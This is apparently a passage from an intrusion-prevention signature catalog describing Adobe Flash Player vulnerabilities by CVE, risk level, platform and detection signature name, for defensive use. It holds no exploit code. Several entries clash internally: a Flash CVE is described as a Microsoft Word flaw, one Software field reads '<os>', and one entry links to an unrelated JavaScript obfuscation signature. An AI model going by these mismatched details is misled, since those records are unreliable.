Malfunction

Description:

A write what where vulnerability exists in Adobe Flash Player. The vulnerability is due to a memory corruption when handling ByteArray objects. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-CVE-2014-8439-Write-What-Where

References:

CVE-2014-8439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8439

BID-71289
http://www.securityfocus.com/bid/71289

OSVDB-115035
http://www.osvdb.org/115035

Adobe-Flash-Player-CVE-2015-3106-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-683-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a Use After Free vulnerability in Adobe Flash Player.

Situation:

File-Flash_Adobe-Flash-Player-CVE-2015-3106-Use-After-Free

References:

CVE-2015-3106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3106

Adobe-Flash-Player-CVE-2015-5561-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-683-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a Use After Free vulnerability in Adobe Flash Player.

Situation:

File-Flash_Adobe-Flash-Player-CVE-2015-5561-Use-After-Free

References:

CVE-2015-5561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5561

Adobe-Flash-Player-CVE-2017-2927

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Flash

Situation:

File-Binary_Adobe-Flash-Player-CVE-2017-2927

References:

CVE-2017-2927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2927

Adobe-Flash-Player-CVE-2017-2934

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-840-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Flash

Situation:

File-Binary_Adobe-Flash-Player-CVE-2017-2934

References:

CVE-2017-2934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2934

Adobe-Flash-Player-CVE-2018-15982-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-1122-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There has been reported a use-after-free vulnerability in Adobe Flash Player. This vulnerability can be exploited by having a target user to open a maliciously crafted SWF that is usually embedded inside a document or a web page. Successful exploitation leads to arbitrary code execution.

Situation:

File-OLE_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
File-Flash_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free

References:

CVE-2018-15982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15982

Adobe-Flash-Player-CVE-2018-4878-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Flash Player Desktop Runtime

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There has been reported a use-after-free vulnerability in Adobe Flash Player. This vulnerability can be exploited by having a target user to open a maliciously crafted SWF file. Successful exploitation leads to arbitrary code execution.

Situation:

File-OLE_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
File-Flash_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free

References:

CVE-2018-4878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878

Adobe-Flash-Player-DeleteRangeTimelineOperation-Type-Confusion

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

Adobe Flash Player

Type:

Type Confusion

Description:

A vulnerability in Adobe Flash Player, version 21.0.0.182, which allows remote attackers to execute arbitrary code via unspecified vectors.

Situation:

File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation

References:

CVE-2016-4117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117

Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue with Worker objects clearing domain memory. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free

References:

CVE-2015-0313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0313

BID-72429
http://www.securityfocus.com/bid/72429

OSVDB-117853
http://www.osvdb.org/117853

Adobe-Flash-Player-Domainmemory-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-627-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Adobe Flash Player. The vulnerability is due to a use after free error when handling the objects referenced by domainMemory. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-Domainmemory-Use-After-Free

References:

CVE-2015-0311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0311

BID-72283
http://www.securityfocus.com/bid/72283

OSVDB-117428
http://www.osvdb.org/117428

Adobe-Flash-Player-Domainmemory-Write-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-656-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A use after free vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue with Worker objects writing domain memory. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-Domainmemory-Write-Use-After-Free

References:

CVE-2015-0359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359

Adobe-Flash-Player-Filereference-Type-Confusion

About this vulnerability:

A vulnerability in Adobe Systems AIR desktop runtime

Risk:

High

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Adobe Flash. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Flash_Adobe-Flash-Player-Filereference-Type-Confusion

References:

CVE-2016-1105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1105

Adobe-Flash-Player-Flawed-Bytecode-Verification-CVE-2017-11292

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a bytecode verification vulnerability in Adobe Flash player.

Situation:

File-Flash_Invalid-Bytecode-CVE-2017-11292

References:

CVE-2017-11292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11292

Adobe-Flash-Player-FLV-Processing-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Adobe Flash Player. The vulnerability is due to lack of input validation while parsing script data tags in FLV files. A remote attacker can exploit this vulnerability by enticing the target user to open malicious FLV files, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
File-Flash_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow

References:

CVE-2007-3456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3456

BID-24856
http://www.securityfocus.com/bid/24856

OSVDB-38054
http://www.osvdb.org/38054

Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution

About this vulnerability:

A vulnerability in Adobe Systems Flash Player (for Linux)

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Adobe Flash Player; Adobe Systems AIR

Type:

Input Validation

Description:

There exists a remote command execution vulnerability in Adobe Flash Player for Linux.

Situation:

HTTP_SS-Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-3
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-2

References:

CVE-2008-5499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499

BID-32896
http://www.securityfocus.com/bid/32896

OSVDB-50796
http://www.osvdb.org/50796

Adobe-Flash-Player-Function-Variables-Information-Disclosure

About this vulnerability:

An attempt to exploit vulnerability in Adobe Flash Player Detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A code execution vulnerability exists in Adobe Flash Player 10. The vulnerability is due to information disclosure when passing variable length arguments to an ActionScript function. The vulnerability could allow a remote attacker to access arbitrary memory locations in ActionScript in order to execute arbitrary code on the affected system through techniques such as forced type confusion.

Situation:

HTTP_SS-Adobe-Flash-Player-Function-Variables-Information-Disclosure
File-Flash_Adobe-Flash-Player-Function-Variables-Information-Disclosure

References:

CVE-2011-2110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110

OSVDB-73007
http://www.osvdb.org/73007

Adobe-Flash-Player-Index-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-497-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

There is an index overflow vulnerability in Adobe Flash player.

Situation:

File-Flash_Adobe-Flash-Player-Index-Overflow-Vulnerability

References:

CVE-2012-5676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5676

Adobe-Flash-Player-Information-Disclosure

About this vulnerability:

An Adobe Flash Player Information Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Insecure Configuration

Description:

A vulnerability in Adobe Flash Player Manager, versions before 14.0.0.145, which allows remote attackers to obtain sensitive information by conducting a cross-site request forgery attack against JSONP endpoints.

Situation:

File-Text_Adobe-Flash-Player-Information-Disclosure

References:

CVE-2014-4671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4671

Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player; Adobe Flash Professional; Adobe Systems AIR; Adobe Systems Flex

Type:

Malfunction

Description:

A vulnerability exists in the Adobe Flash Player.

Situation:

HTTP_SS-Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
File-Text_Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution

References:

CVE-2009-0520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0520

BID-33880
http://www.securityfocus.com/bid/33880

Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow

About this vulnerability:

A heap overflow vulnerability in Adobe Systems Macromedia Flash Player

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Adobe Flash Player. The vulnerability is due to lack of input validation while parsing height and width fields in the JPG header. A remote attacker can exploit this vulnerability by enticing the target user to open malicious SWF files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.

Situation:

HTTP_SS-Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
File-Flash_Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow

References:

CVE-2007-6242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6242

BID-26951
http://www.securityfocus.com/bid/26951

Adobe-Flash-Player-Load-And-Store-Write-What-Where

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-566-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Input Validation

Description:

An code execution vulnerability exists in Adobe Flash player. It has been reported to be used by malware in the wild. A remote attacker could exploit this vulnerability by enticing a user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Flash_Adobe-Flash-Player-Load-And-Store-Write-What-Where

References:

CVE-2014-0497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0497

BID-65327
http://www.securityfocus.com/bid/65327

Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems AIR

Risk:

High

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Flash Player

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Adobe Flash player. When the flash.media.Sound.loadPCMFromByteArray function is called with a large number of samples in the parameter, an integer overflow occurs. This is then used in the indexing of arrays leading to a potential buffer overflow. A remote attacker could exploit these vulnerabilities by enticing a user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Flash_Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow

References:

CVE-2012-5677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5677

BID-56896
http://www.securityfocus.com/bid/56896

OSVDB-88353
http://www.osvdb.org/88353

Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-1032-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There has been reported an out-of-bounds access vulnerability in Adobe Flash Player. A remote attacker could exploit the vulnerability by enticing a user to open a maliciously crafted SWF file or a link. Successful exploitation of this vulnerability could lead to arbitrary code execution.

Situation:

File-Flash_Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access

References:

CVE-2017-3114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3114

Adobe-Flash-Player-MP4-File-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-444-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Integer Overflow

Description:

There is a memory corruption vulnerability in Adobe Flash Player. The vulnerability is due to insufficient validation of a user-supplied length value when parsing MP4 files, which leads to an integer wraparound. A remote attacker could exploit this vulnerability by enticing a user to open a malicious MP4 file. Successful exploitation of this vulnerability would lead to execution of arbitrary code in the security context of the target user.

Situation:

File-MPEG_Adobe-Flash-Player-MP4-File-Memory-Corruption

References:

CVE-2012-0754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

BID-52034
http://www.securityfocus.com/bid/52034

OSVDB-79300
http://www.osvdb.org/79300

Adobe-Flash-Player-MP4-File-Memory-Corruption-CVE-2015-0360

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Integer Overflow

Description:

There is a memory corruption vulnerability in Adobe Flash Player. A remote attacker could exploit this vulnerability by enticing a user to open a malicious MP4 file. Successful exploitation of this vulnerability would lead to execution of arbitrary code in the security context of the target user.

Situation:

File-MPEG_Adobe-Flash-Player-MP4-File-Memory-Corruption

References:

CVE-2015-0360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360

Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF

About this vulnerability:

A vulnerability in Adobe Systems AIR

Risk:

High

First detected in:

sgpkg-ips-442-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Flash Player

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in Adobe Flash Player. The issue can manifest itself when it parses the Sequence Parameter Set structure in an MP4 file. An attacker could exploit this vulnerability by enticing a target user to visit a specially crafted web page. A successful attack leveraging this vulnerability could lead to arbitrary code execution on the vulnerable system in the security context of the affected application.

Situation:

File-MPEG_Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF

References:

CVE-2011-2140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2140

OSVDB-74439
http://www.osvdb.org/74439

Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Flash Player Desktop Runtime

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Adobe Flash Player. The vulnerability is due to an issue with the processing of Nellymoser audio tag data. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in arbitrary code execution in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow

References:

CVE-2015-3113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3113

Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-488-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to memory access without bounds checking while verifying OP_inclocal and OP_declocal opcodes. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to open a Flash file with an affected version of Adobe Flash Player. Successful exploitation would result in execution of arbitrary code in the security context of the affected application.

Situation:

File-Flash_Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption

References:

CVE-2012-5271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5271

OSVDB-86048
http://www.osvdb.org/86048

Adobe-Flash-Player-Rectangle-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Adobe Flash Player. A remote, unauthenticated attacker can use this to execute arbitrary code in the affected system.

Situation:

File-Flash_Adobe-Flash-Player-Rectangle-Use-After-Free

References:

CVE-2016-4228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4228

Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-461-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Input Validation

Description:

A vulnerability has been reported in Adobe's flash player. The vulnerability is due to an unspecified type confusion. A remote attacker could exploit this vulnerability by enticing a target user to open web content containing an embedded flash file, or by enticing a user to open a flash email attachment. A successful exploitation attempt may result in the execution of arbitrary code in the target user's security context. Adobe is reporting that this vulnerability is currently being exploited in the wild.

Situation:

Generic_SS-Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion

References:

CVE-2012-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0779

BID-53395
http://www.securityfocus.com/bid/53395

OSVDB-81656
http://www.osvdb.org/81656

Adobe-Flash-Player-Security-Bypass-CVE-2015-3099

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A vulnerability exists in Adobe Flash Player.

Situation:

File-Text_Adobe-Flash-Player-Security-Bypass-CVE-2015-3099

References:

CVE-2015-3099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3099

Adobe-Flash-Player-Security-Bypass-CVE-2015-3102

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A vulnerability exists in Adobe Flash Player.

Situation:

HTTP_CSU-Adobe-Flash-Player-Security-Bypass-CVE-2015-3102

References:

CVE-2015-3102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3102

Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a security context bypass vulnerability in Adobe Flash Player.

Situation:

File-Text_Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044

References:

CVE-2015-3044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044

Adobe-Flash-Player-Shader-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-585-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A code execution vulnerability exists in Adobe Flash Player. The vulnerability is due to a memory corruption error while processing crafted Shader objects. A remote attacker could exploit this vulnerability by enticing a target user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Flash_Adobe-Flash-Player-Shader-Memory-Corruption

References:

CVE-2014-0515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0515

BID-67092
http://www.securityfocus.com/bid/67092

OSVDB-106347
http://www.osvdb.org/106347

Adobe-Flash-Player-Shader-Parameter-Write-What-Where

About this vulnerability:

A vulnerability in Adobe Systems AIR desktop runtime

Risk:

High

First detected in:

sgpkg-ips-658-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player

Type:

Malfunction

Description:

A write-what-where vulnerability has been reported in a Adobe Flash Player. The vulnerability is due to an issue with processing Shader objects. A remote attacker could exploit this vulnerability by enticing a user into opening a page with a malicious SWF embedded within. Successful exploitation could lead to arbitrary code execution under the security context of the user process.

Situation:

File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where
File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-2
File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-3

References:

CVE-2015-3105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3105

Adobe-Flash-Player-ShaderJob-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-658-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Flash Player

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Adobe Flash Player. The vulnerability is due to a race condition in the shader class, in which asynchronously modifying the width/height of a shader object while starting a shader job will result in corrupting the memory. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-ShaderJob-Memory-Corruption

References:

CVE-2015-3090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090

Adobe-Flash-Player-Sharedobject-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems AIR

Risk:

High

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Flash Player

Type:

Malfunction

Description:

A code execution vulnerability exists in Adobe Flash Player. The vulnerability is due to a use-after-free error when terminating a worker thread containing a SharedObject. A remote attacker could exploit this vulnerability by enticing a target user to visit a web page embedding a specially crafted Flash file. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user. Note that this vulnerability is being actively exploited in the wild.

Situation:

File-Flash_Adobe-Flash-Player-Sharedobject-Use-After-Free

References:

CVE-2014-0502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0502

BID-65702
http://www.securityfocus.com/bid/65702

OSVDB-103518
http://www.osvdb.org/103518

Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-456-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player; Adobe Systems AIR

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Word.

Situation:

File-Text_Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035

References:

CVE-2012-2035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2035

Adobe-Flash-Player-SWF-File-Code-Execution

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-154-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a vulnerability in Adobe Flash Player that allows execution of arbitrary code in the context of the current user.

Situation:

HTTP_SS-Adobe-Flash-Player-SWF-File-Code-Execution
File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution
File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution-2

References:

CVE-2007-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0071

BID-29695
http://www.securityfocus.com/bid/29695

BID-29386
http://www.securityfocus.com/bid/29386

OSVDB-44282
http://www.osvdb.org/44282

Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

High

First detected in:

sgpkg-ips-664-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Adobe Flash Player. The vulnerability is due a use-after-free situation when handling the opaqueBackground property of a TextLine object. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted Flash content, though other attack vectors such as Microsoft Office documents may also be viable. A successful exploitation could result in arbitrary code execution in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free

References:

CVE-2015-5122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122

Adobe-Flash-Player-Type-Confusion-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Adobe Flash Player. A successful attack may lead to code execution in the context of the current user.

Situation:

File-Flash_Adobe-Flash-Player-Type-Confusion-Memory-Corruption

References:

CVE-2012-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0752

Adobe-Flash-Player-Use-After-Free-CVE-2015-5122

About this vulnerability:

Adobe Flash Player Use After Free

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Flash Player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-5122

References:

CVE-2015-5122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122

BID-75712
http://www.securityfocus.com/bid/75712

Adobe-Flash-Player-Use-After-Free-CVE-2015-8413

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Adobe Flash Player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8413

References:

CVE-2015-8413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8413

Adobe-Flash-Player-Use-After-Free-CVE-2015-8430

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Use-after-free

